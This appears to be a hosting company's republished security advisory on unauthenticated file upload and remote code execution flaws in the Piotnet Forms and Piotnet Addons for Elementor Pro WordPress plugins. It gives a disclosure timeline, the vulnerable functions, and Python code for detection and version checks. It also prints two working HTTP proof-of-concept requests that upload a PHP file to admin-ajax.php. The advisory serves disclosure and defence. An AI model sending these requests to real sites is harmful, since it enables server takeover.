HaBangNet


News: High severity vulnerabilities in Piotnet Forms Free/Pro and Piotnet Addons For Elementor Pro Plugins

Published: 21/10/2021

Recently, the Imunify360 team discovered high severity vulnerabilities in the Piotnet Forms Free/Pro and Piotnet Addons for Elementor Pro plugins. Sergey Brazhnik, Security Analyst from the Imunify360 Web Protection Team, conducted a detailed analysis of the Piotnet Forms and Addons vulnerabilities. Keep on reading to find out more about the following:



  1. Piotnet Vulnerabilities: Summary and Timeline

  2. Piotnet Vulnerabilities Details

  3. Recommendations

  4. Recommended articles


Piotnet Vulnerabilities: Summary and Timeline




On July 7, 2021, the Imunify360 Web Protection team started the responsible disclosure process for Unauthenticated File Upload and Remote Code Execution vulnerabilities discovered in the Piotnet Forms Free/Pro and Piotnet Addons for Elementor Pro plugins. An attacker could potentially upload malicious files to the plugins' upload directory and execute the uploaded scripts.


Naturally, Imunify360 customers were protected from these vulnerabilities and all initial exploitation attempts were blocked by Imunify360. 


The Piotnet developers were provided with a detailed report on July 7, 2021, followed by a PoC and recommendations on August 25, 2021. Since there were no updates from the developers, the WordPress.org plugins team was informed that a vulnerable free plugin version was available on the https://wordpress.org/plugins/piotnetforms/ marketplace. The WordPress.org team temporarily blocked the plugin from public access on September 27, 2021. As a result, the new 1.0.23 version of Piotnet Forms Free was released on October 1, 2021.


Finally, on October 13, 2021, the Piotnet developers released patched versions of Piotnet Forms Pro (1.1.14) and Piotnet Addons For Elementor Pro (6.4.12).


 


Piotnet Vulnerabilities Details


Description: Unauthenticated File Upload and RCE in Piotnet Forms


Affected Plugin: Piotnet Forms


Affected Versions: <= 1.0.22


CVE ID: pending


CVSS Score: 9.8 (Critical)


CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H


Fully Patched Version: 1.0.23


 


Description: Unauthenticated File Upload and RCE in Piotnet Forms Pro


Affected Plugin: Piotnet Forms Pro


Affected Versions: <=1.1.13  


CVE ID: pending


CVSS Score: 9.8 (Critical)


CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H


Fully Patched Version: 1.1.14


 


For the Piotnet Forms plugins, both Free and Pro versions, the vulnerable function is:









piotnetforms_ajax_form_builder



 


Vulnerable file:









inc/forms/ajax-form-builder.php



 


The function is allowed for non-authenticated users.


Furthermore, there is no validation of the parameters required by this function, such as post_id and form_id; for an attack to be successful, the parameters only need to be present in the request.

Next, the function's code doesn't check the extension of the uploaded files, which makes it possible to upload files with arbitrary extensions and then execute them.

Finally, although the file name is generated randomly, the /wp-content/uploads/piotnetforms/files/ folder has file listing enabled and is available for visitors to view.


 


PoC:


 









POST /wp-admin/admin-ajax.php HTTP/1.1
Host: vuln_domain.com
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=--------205816383
Content-Length: 645
Origin: http://vuln_domain.com
Connection: close

----------205816383
Content-Disposition: form-data; name="action"

piotnetforms_ajax_form_builder
----------205816383
Content-Disposition: form-data; name="post_id"

11111
----------205816383
Content-Disposition: form-data; name="form_id"

d253bdb1
----------205816383
Content-Disposition: form-data; name="fields"

[]
----------205816383
Content-Disposition: form-data; name="referrer"

http://domain.com/?page_id=2
----------205816383
Content-Disposition: form-data; name="file[]"; filename="file.php"
Content-Type: application/octet-stream

echo("PoC for vulnerability is confirmed");
?>
----------205816383--






Description: Unauthenticated File Upload and RCE in Piotnet Addons for Elementor Pro


Affected Plugin: Piotnet Addons for Elementor Pro


Affected Versions: <=6.4.11 


CVE ID: pending


CVSS Score: 9.8 (Critical)


CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H


Fully Patched Version: 6.4.12


 


For Piotnet Addons For Elementor Pro, the case is quite similar, except that the function name is pafe_ajax_form_builder and the uploads directory is /wp-content/uploads/piotnet-addons-for-elementor/, while the rest of the code is identical. The free version available on https://wordpress.org/plugins/piotnet-addons-for-elementor/ is NOT affected since it doesn’t contain the vulnerable functionality.


 


PoC:


 









POST /wp-admin/admin-ajax.php HTTP/1.1
Host: vuln_domain.com
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=--------205816383
Content-Length: 645
Origin: http://vuln_domain.com
Connection: close

----------205816383
Content-Disposition: form-data; name="action"

pafe_ajax_form_builder
----------205816383
Content-Disposition: form-data; name="post_id"

11111
----------205816383
Content-Disposition: form-data; name="form_id"

d253bdb1
----------205816383
Content-Disposition: form-data; name="fields"

[]
----------205816383
Content-Disposition: form-data; name="referrer"

http://domain.com/?page_id=2
----------205816383
Content-Disposition: form-data; name="file[]"; filename="file.php"
Content-Type: application/octet-stream

echo("PoC for vulnerability is confirmed");
?>
----------205816383--
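
Both requests above share one shape that can be checked before the plugin code runs. The following Python is an added example, not code from Imunify360 or Piotnet: it flags multipart requests to admin-ajax.php that name either upload action and carry a file whose name has an interpreter-handled suffix. The extension list, the function names and the sample request builder are assumptions constructed for illustration.

```python
from email import message_from_bytes

# Action names are the two AJAX handlers named in the advisory above.
UPLOAD_ACTIONS = {"piotnetforms_ajax_form_builder", "pafe_ajax_form_builder"}
# Assumption: suffixes a PHP host may pass to an interpreter; tune per server.
EXEC_EXTS = {"php", "php5", "php7", "phtml", "phar", "pht", "cgi", "pl"}


def risky_uploads(path, content_type, body):
    """Return uploaded filenames that should be blocked for this request."""
    if not path.split("?", 1)[0].endswith("/wp-admin/admin-ajax.php"):
        return []
    if not content_type.lower().startswith("multipart/form-data"):
        return []
    # Reuse the stdlib MIME parser: prepend the header that carries the boundary.
    msg = message_from_bytes(
        b"Content-Type: " + content_type.encode("latin-1") + b"\r\n\r\n" + body)
    action, filenames = None, []
    for part in msg.walk():
        if part.is_multipart():
            continue
        if part.get_param("name", header="content-disposition") == "action":
            action = part.get_payload(decode=True).decode("latin-1").strip()
        if part.get_filename():
            filenames.append(part.get_filename())
    if action not in UPLOAD_ACTIONS:
        return []
    # Check every dot-separated suffix so "a.PHP" and "a.php.jpg" are both caught.
    return [f for f in filenames
            if EXEC_EXTS & set(f.lower().rstrip(". ").split(".")[1:])]


def sample_request(action, filename):
    """Constructed multipart body for testing (boundary and payload are made up)."""
    boundary = "sample-boundary-1"
    fields = [("action", None, action), ("post_id", None, "1"),
              ("form_id", None, "abc"), ("file[]", filename, "constructed payload")]
    lines = []
    for name, fname, value in fields:
        disp = f'Content-Disposition: form-data; name="{name}"'
        if fname:
            disp += f'; filename="{fname}"'
        lines += ["--" + boundary, disp, "", value]
    lines.append("--" + boundary + "--")
    body = "\r\n".join(lines).encode() + b"\r\n"
    return "multipart/form-data; boundary=" + boundary, body
```

A body the parser cannot split into parts yields no action and therefore no finding, so a production rule should treat unparseable uploads to these actions as a block rather than a pass.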



 


Recommendations




To protect your servers from exploitation of these vulnerabilities, we strongly recommend:



  • Enabling Imunify360 security features like WAF, Proactive Defence, Real-time Malware Scan and PHP Immunity, since, apart from rules created for these particular vulnerabilities, your servers will be proactively protected with a complex generic system that is able to detect suspicious activity and stop attackers on the fly.

  • Updating your Piotnet plugins to the latest versions.
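
To triage a host against these recommendations, the following Python is an added example (not part of the original advisory or of any vendor tool): it compares an installed version with the fixed versions listed above and lists script-like files in the two upload directories the advisory names. The product labels, the extension list and the function names are assumptions made for this example.

```python
import os
import re

# Fixed versions as listed in the advisory; the keys are labels chosen here.
FIXED = {
    "piotnet-forms-free": (1, 0, 23),
    "piotnet-forms-pro": (1, 1, 14),
    "piotnet-addons-for-elementor-pro": (6, 4, 12),
}
# Upload directories named in the advisory, relative to the WordPress root.
UPLOAD_DIRS = [
    "wp-content/uploads/piotnetforms/files",
    "wp-content/uploads/piotnet-addons-for-elementor",
]
# Assumption: suffixes a PHP host may pass to an interpreter; tune per server.
EXEC_EXTS = {"php", "php5", "php7", "phtml", "phar", "pht", "cgi", "pl"}


def needs_update(product, version):
    """True if the installed version string is older than the fixed release."""
    installed = tuple(int(n) for n in re.findall(r"\d+", version))
    return installed < FIXED[product]


def suspicious_files(wp_root):
    """Return (relative path, mtime) of script-like uploads, oldest first."""
    hits = []
    for rel in UPLOAD_DIRS:
        # os.walk yields nothing for a missing directory, so absent plugins are fine.
        for dirpath, _dirs, files in os.walk(os.path.join(wp_root, rel)):
            for name in files:
                suffixes = set(name.lower().rstrip(". ").split(".")[1:])
                if EXEC_EXTS & suffixes:
                    full = os.path.join(dirpath, name)
                    hits.append((os.path.relpath(full, wp_root),
                                 os.path.getmtime(full)))
    return sorted(hits, key=lambda h: h[1])


if __name__ == "__main__":
    import sys
    import time
    root = sys.argv[1] if len(sys.argv) > 1 else "."
    for path, mtime in suspicious_files(root):
        print(time.strftime("%Y-%m-%d %H:%M", time.localtime(mtime)), path)
```

Any hit deserves review together with the web server access log around the file's modification time, since a form upload directory has no legitimate reason to hold server-side scripts.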


Take your web hosting security to the next level with Imunify360 security suite. Imunify360 is a complete security suite with all components working together to keep your servers safe and running while you could focus on other business tasks. Imunify360 is a synergy of Antivirus for Linux Server, Firewall, WAF, PHP Security Layer, Patch Management, Domain Reputation with easy UI and advanced automation. Try Imunify360 free for 14 days and see results in just one week.




 

For more information, refer to https://blog.imunify360.com/high-severity-vulnerabilities-in-piotnet-forms-free/pro-and-piotnet-addons-for-elementor-pro-plugins?utm_campaign=Imunify360%20Blog&utm_content=183953951&utm_medium=social&utm_source=twitter&hss_channel=tw-775448843206860800

